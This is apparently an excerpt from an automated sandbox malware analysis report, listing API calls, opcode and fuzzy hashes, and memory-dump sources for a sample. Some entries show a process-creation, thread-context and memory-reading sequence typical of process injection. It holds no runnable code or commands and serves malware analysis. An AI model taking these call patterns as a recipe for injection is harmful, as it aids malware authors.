                                                                              • API String ID: 1194219731-2761332787
                                                                              • Opcode ID: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                              • Instruction ID: 1fd31f67f6889806bd2ce24d6488871f5ee50ddf162d20410a363c4a19aba518
                                                                              • Opcode Fuzzy Hash: 6830d432ce0edc537904fcc81a92ccb4243d6e1eaca554fb6fd30da9042373f9
                                                                              • Instruction Fuzzy Hash: 022158B260825067C724EF7A9C8266EF7D8AF85308F148C3FF554D2282F638D555879A
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03ECB673
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ECB709
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ECB72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                              • Instruction ID: 68560e5f5f139f9f22dba9b5dbc431d8aea4765eaa8daa08d483684e23c177da
                                                                              • Opcode Fuzzy Hash: 75058a4f97cf2fcbd3f6bc15a6ffc08ef8895de4d25848071cc819695d886454
                                                                              • Instruction Fuzzy Hash: 18621B30A24259DBEB24CFA4C951BDEB376EF58300F1091A9D10DEB390E7769E81CB59
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00411734
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                • Part of subcall function 004116B0: std::exception::exception.LIBCMT ref: 004116BC
                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                              • __CxxThrowException@8.LIBCMT ref: 00411779
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                                              • String ID:
                                                                              • API String ID: 1411284514-0
                                                                              • Opcode ID: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                              • Instruction ID: c554e94cc15d94fff19a40754e7570613bf3612ee9c26c673f8185df9075a277
                                                                              • Opcode Fuzzy Hash: ca7221cdd9cc9326792a0c346bb7c35cd30f9974032eaa45b6addcc39664c516
                                                                              • Instruction Fuzzy Hash: 6FF0E23550060A66CF08B723EC06ADE3B649F11798B10403BFA20552F2DF6DADC9865C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction ID: a1f682be926937ece900e9fcc50ccc13891f43ead78ba7c6857800eee9f0599c
                                                                              • Opcode Fuzzy Hash: c2b84d901eedfcb5732c73c427cf3e6a40f349a1394e6728fcd5bdf3f2a5d4d9
                                                                              • Instruction Fuzzy Hash: EC81D2756043009FC310EF65C985B6AB7E4EF84315F008D2EF988AB392D779E909CB96
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(80000001,0040F0EE,00000000,00000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F132
                                                                              • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F14F
                                                                              • RegCloseKey.KERNELBASE(00000000,?,?,00000000,00000000,80000001,80000001,?,0040F0EE,80000001,Control Panel\Mouse,SwapMouseButtons,00000004,?,?,0044BA28), ref: 0040F159
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CloseOpenQueryValue
                                                                              • String ID:
                                                                              • API String ID: 3677997916-0
                                                                              • Opcode ID: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction ID: 6acd5c45b0bc896a902747136fbadff1bb775023c46fd22fba7b324c5144c726
                                                                              • Opcode Fuzzy Hash: 2fc94d7b08a1a7677ebb25c0c676948635cded20fa34e442ec21f1e1bf5971ab
                                                                              • Instruction Fuzzy Hash: 60F0BDB0204202ABD614DF54DD88E6BB7F9EF88704F10492DB585D7250D7B4A804CB26
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 00435278
                                                                                • Part of subcall function 004138BA: __FF_MSGBANNER.LIBCMT ref: 004138DD
                                                                                • Part of subcall function 004138BA: __NMSG_WRITE.LIBCMT ref: 004138E4
                                                                                • Part of subcall function 004138BA: RtlAllocateHeap.NTDLL(00000000,0041172A,?,?,?,?,00411739,?,00401C0B), ref: 00413931
                                                                              • _malloc.LIBCMT ref: 00435288
                                                                              • _malloc.LIBCMT ref: 00435298
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _malloc$AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 680241177-0
                                                                              • Opcode ID: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                              • Instruction ID: 30b75876ff52ae1c35022de4a6700901ba1db26c97f4d16f7fcf584af9a5a73f
                                                                              • Opcode Fuzzy Hash: d11b1792ef3d24f06ef5636d78d46cf58a843b0d423fa777cd48d8e801ebef30
                                                                              • Instruction Fuzzy Hash: E5F0A0B1500F0046E660AB3198457C7A2E09B14307F00186FB6855618ADA7C69C4CEAC
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                              • Instruction ID: 1f11e118333250ff1b1cce483c812f274274124743f71e781b8a547d9d3e43da
                                                                              • Opcode Fuzzy Hash: 8496133a3e3a1872fc5ab7f8f11462cad1d7adca9b2736ff52cb45440ba86ce9
                                                                              • Instruction Fuzzy Hash: 35917E706042009FC714DF55D890A6AB7E5EF89318F14896FF849AB392D738EE41CB9E
                                                                              APIs
                                                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 0040F00A
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000004,00000080,00000000,?,0040DFD2,?,00000001,00403843,?), ref: 004299D9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                              • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                              • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                              • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __lock_file_memset
                                                                              • String ID:
                                                                              • API String ID: 26237723-0
                                                                              • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                              • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                              • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                              APIs
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              • __lock_file.LIBCMT ref: 00414EE4
                                                                                • Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
                                                                              • __fclose_nolock.LIBCMT ref: 00414EEE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
                                                                              • String ID:
                                                                              • API String ID: 717694121-0
                                                                              • Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
                                                                              • Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
                                                                              • Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
                                                                              APIs
                                                                              • TranslateMessage.USER32(?), ref: 004098F6
                                                                              • DispatchMessageW.USER32(?), ref: 00409901
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchTranslate
                                                                              • String ID:
                                                                              • API String ID: 1706434739-0
                                                                              • Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                              • Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
                                                                              • Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
                                                                              • Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
                                                                              APIs
                                                                              • TranslateMessage.USER32(?), ref: 004098F6
                                                                              • DispatchMessageW.USER32(?), ref: 00409901
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Message$DispatchTranslate
                                                                              • String ID:
                                                                              • API String ID: 1706434739-0
                                                                              • Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                              • Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
                                                                              • Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
                                                                              • Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
                                                                              APIs
                                                                              • CreateProcessW.KERNELBASE(?,00000000), ref: 03ECB673
                                                                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03ECB709
                                                                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03ECB72B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714904224.0000000003EC9000.00000040.00000020.00020000.00000000.sdmp, Offset: 03EC9000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_3ec9000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 2438371351-0
                                                                              • Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                              • Instruction ID: a6303ca87d3b447bccc0f0f5188f53fed01258f109de823108a696b70966b65e
                                                                              • Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
                                                                              • Instruction Fuzzy Hash: CF12BF24A24658C6EB24DF64D8507DEB232EF68300F1061E9910DEB7A5E77A4E81CF5A
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                              • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                              • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                              • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                              • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                              • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                              • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                              APIs
                                                                              • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHeap
                                                                              • String ID:
                                                                              • API String ID: 10892065-0
                                                                              • Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
                                                                              • Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
                                                                              • Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
                                                                              APIs
                                                                                • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
                                                                              • WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: File$PointerWrite
                                                                              • String ID:
                                                                              • API String ID: 539440098-0
                                                                              • Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                              • Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
                                                                              • Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
                                                                              • Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ProcWindow
                                                                              • String ID:
                                                                              • API String ID: 181713994-0
                                                                              • Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
                                                                              • Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
                                                                              • Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
                                                                              APIs
                                                                              Memory Dump Source
